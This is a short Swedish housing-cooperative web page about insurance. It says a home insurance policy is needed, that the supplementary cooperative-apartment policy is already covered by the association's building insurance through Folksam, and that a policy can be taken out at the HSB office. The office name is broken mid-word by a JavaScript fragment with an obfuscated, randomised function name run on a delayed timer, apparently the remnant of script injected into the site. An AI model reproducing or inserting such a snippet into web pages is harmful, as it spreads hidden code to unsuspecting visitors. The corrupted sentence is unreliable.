Försäkringar

Det är viktigt att ha en hemförsäkring för bostadsrättslägenheten man bor i.

Bostadsrättsförsäkringen som är en tilläggsförsäkring är inte aktuell att teckna eftersom den ingår i föreningens fastighetsförsäkring via Folksam.

På HSB Landom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andskronas kontor går det att teckna en försäkring där avgiften erläggs tillsammans med månadsavgiften.